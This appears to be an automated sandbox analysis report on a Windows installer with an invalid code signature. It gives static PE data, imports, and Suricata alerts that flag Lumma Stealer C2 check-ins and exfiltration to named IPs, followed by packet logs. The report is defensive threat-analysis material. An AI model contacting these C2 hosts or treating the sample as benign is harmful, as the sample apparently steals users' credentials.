                                                                                                                                                                                                                                                              TLSH:47F792DB1212D23238537C47B4909F6298B8CE8D219FC267AB7BC55B271912D139B3F6
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....

                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                              Icon Hash:cc9aa1716d638ecc

                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Entrypoint:0x403883
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                                              Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                                              • 28/03/2024 10:33:37 29/03/2027 11:33:37
                                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                                              • CN=LY Corporation, O=LY Corporation, L=Chiyoda-ku, S=Tokyo, C=JP, OID.1.3.6.1.4.1.311.60.2.1.3=JP, SERIALNUMBER=010401039979, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                                              Thumbprint MD5:0829E51406B873B17F0EFEA626560718
                                                                                                                                                                                                                                                              Thumbprint SHA-1:3E85990B906DD895BB28206319546E2EEBA81336
                                                                                                                                                                                                                                                              Thumbprint SHA-256:4ED8E9F0EBAC3FB0DCDF981D3D82D8BE6CE03D745AD229D0D929A70C5FA55F57
                                                                                                                                                                                                                                                              Serial:5FDDA5954FDB2F00B1EFD5C8

                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 00409268h
                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                              call dword ptr [00408030h]
                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                              call dword ptr [004080B4h]
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [004082C0h]
                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                              mov dword ptr [00472EB8h], eax
                                                                                                                                                                                                                                                              call 00007FC244C8876Bh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                              mov dword ptr [00472DD0h], eax
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 00409264h
                                                                                                                                                                                                                                                              call dword ptr [00408184h]
                                                                                                                                                                                                                                                              push 0040924Ch
                                                                                                                                                                                                                                                              push 0046ADC0h
                                                                                                                                                                                                                                                              call 00007FC244C8844Dh
                                                                                                                                                                                                                                                              call dword ptr [004080B0h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              mov edi, 004C30A0h
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              call 00007FC244C8843Bh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [00408134h]
                                                                                                                                                                                                                                                              cmp word ptr [004C30A0h], 0022h
                                                                                                                                                                                                                                                              mov dword ptr [00472DD8h], eax
                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                              jne 00007FC244C85D3Ah
                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov eax, 004C30A2h
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call 00007FC244C88111h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call dword ptr [00408260h]
                                                                                                                                                                                                                                                              mov esi, eax
                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                              jmp 00007FC244C85DC3h
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                              cmp ax, bx
                                                                                                                                                                                                                                                              jne 00007FC244C85D3Ah
                                                                                                                                                                                                                                                              add esi, 02h
                                                                                                                                                                                                                                                              cmp word ptr [esi], bx

                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xf962.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x45fffe30x5cc0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0xf40000xf9620xfa00955880a5097bce6ee1e1142b429d7486False0.913data7.694370424089605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .reloc0x1040000xf320x10009de3947dffd0e7fa5ae1af4905563fd3False0.599609375data5.511097810722672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_ICON0xf42500x89ffPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9998867721572735
                                                                                                                                                                                                                                                              RT_ICON0xfcc500x2b7cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0009881422924902
                                                                                                                                                                                                                                                              RT_ICON0xff7cc0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.6672091131000814
                                                                                                                                                                                                                                                              RT_ICON0x101e340x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.7449908925318761
                                                                                                                                                                                                                                                              RT_ICON0x102f5c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.848404255319149
                                                                                                                                                                                                                                                              RT_DIALOG0x1033c40x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                              RT_DIALOG0x1034c40x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                              RT_DIALOG0x1035e00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x1036400x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                                                                                                                              RT_MANIFEST0x10368c0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2025-01-06T12:16:42.314150+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549842104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:42.805604+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549842104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:42.805604+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549842104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:43.277898+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549846104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:43.751262+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549846104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:43.751262+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549846104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:44.508617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549853104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:45.040597+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549853104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:45.564061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549860104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:46.693463+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549867104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:48.136643+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549877104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:49.164360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549888104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:50.509865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549897104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:52.602900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549910104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:53.072951+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549910104.21.44.159443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:53.792055+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549920185.161.251.21443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:54.558874+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549927172.67.208.58443TCP
                                                                                                                                                                                                                                                              2025-01-06T12:16:55.007739+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.208.58443192.168.2.549927TCP

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.838211060 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.838263035 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.838459015 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.839664936 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:41.839689016 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.314085960 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.314150095 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.320610046 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.320630074 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.320846081 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.363965034 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.383907080 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.383935928 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.383974075 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.805588007 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.805680037 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.805826902 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.808206081 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.808234930 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.808249950 CET49842443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.808254957 CET44349842104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.814482927 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.814518929 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.814610958 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.814914942 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:42.814925909 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.277832031 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.277898073 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.279170036 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.279176950 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.279398918 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.281085968 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.281148911 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.281173944 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751296997 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751343966 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751399040 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751405001 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751420021 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751449108 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751490116 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751496077 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751526117 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751533031 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751538038 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751575947 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751580000 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.751890898 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.752942085 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.752947092 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.755887985 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.755939960 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.755945921 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.801486015 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.837894917 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.837956905 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.838026047 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.838028908 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.838038921 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.838074923 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.838082075 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.838181019 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.840964079 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841027975 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841039896 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841048002 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841053963 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026288033 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026330948 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026421070 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026673079 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026686907 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.508439064 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.508616924 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.509675980 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.509687901 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.509962082 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.511064053 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.511212111 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.511244059 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040587902 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040673971 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040935040 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040935040 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087043047 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087090969 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087192059 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087501049 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087513924 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.348366976 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.348404884 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.563982010 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.564060926 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.565241098 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.565253019 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.565494061 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566744089 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566906929 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566932917 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566987991 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.611329079 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.024979115 CET44349860104.21.44.159192.168.2.5
